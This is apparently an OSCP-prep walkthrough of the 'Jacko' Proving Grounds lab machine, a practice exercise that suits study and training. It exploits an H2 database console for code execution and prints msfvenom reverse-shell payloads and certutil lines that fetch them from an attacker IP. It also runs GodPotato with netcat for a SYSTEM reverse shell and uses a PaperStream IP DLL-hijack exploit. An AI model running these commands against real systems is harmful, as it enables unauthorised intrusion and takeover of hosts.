> For the complete documentation index, see [llms.txt](https://aditya-3.gitbook.io/oscp/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://aditya-3.gitbook.io/oscp/readme/walkthroughs/pg-practice/jacko.md).

# Jacko

We discover port 80

## 80

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-989bec5fea40a4cfa9faba5a822a6957434c97c1%2F253012439e700bfa67b5d41985a9b496.png?alt=media) We can change password with the api on this JDBC

## 8082

We are presented with H2 console: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-446386cc228b2f6b47b2d23ac9e650c32c139000%2F6c5598326aef3da42ed907846c3b9599.png?alt=media) We can change the database to something that doesn't exist and check: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c4fb138cd835109ce6c08a65a6abd4f5045f7c49%2Fb990faebb47776755420216ac4334f34.png?alt=media) User tony found

We can try an exploit: <https://www.exploit-db.com/exploits/49384> ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-6e7a62ac217b3a2639984d3074a26ce3220a32c3%2F7cf88c92418a295f4405a5f7c32ce757.png?alt=media) We got working code execution.

Now we can create a shell:

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.236 LPORT=1234 -f exe > reverse.exe
```

now we can transfer this with:

```
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -f http://192.168.45.236/reverse.exe C:/Users/Public/reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
```

Now to get the reverse shell back:

```
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Users/Public/reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7c82fe12b7c0964b3ece322a1d7b2ce5b1308c41%2F47434bdcc2be5e83dbc07a1c6d987558.png?alt=media)![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-62af47dba29342b32a4c821497028ea1af325f1b%2F4cc18d8f5ae10442782b5ab8dcf59a43.png?alt=media) Nothing works

Using full path:

```
C:\Windows\system32\whoami.exe /priv
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d8f20a2b063afe864992134153f13d2e77469a1f%2F44b696b1da475ca1c724d357b930af3b.png?alt=media) We can also set the path:

```
set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;
```

We have SeImpersonatePrivilege so trying Godpotato:

```
.\GodPotato.exe -cmd "C:\Users\Public\nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.236 9092"
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-a2d7f7c6240b43086afb233115a81c09c451ed2d%2F6334a2fc86fe60242ddb752fecb10e65.png?alt=media) ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7af6184f0b2259a1b73e211916679f41612bf018%2F0a6f157d97bf42ceb9d07aaaacb2a39f.png?alt=media) We get a shell but it is a broken shell.

## Alternate Method

We find an unusual program: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-97b8cef3d701dd8358c9875ec0e13a58c31b0da8%2F36f48554f3640252ea10457a1f2010c1.png?alt=media) Using the exploit for PaperStream IP <https://www.exploit-db.com/exploits/49382> Now generate msfvenom payload:

```
msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.45.236 LPORT=9092
```

Transfer it to the machine:

```
certutil -urlcache -f http://192.168.45.236/shell.dll C:\Windows\Temp\UninOldIS.dll
```

Now run exploit:

```
.\paper.ps1
```
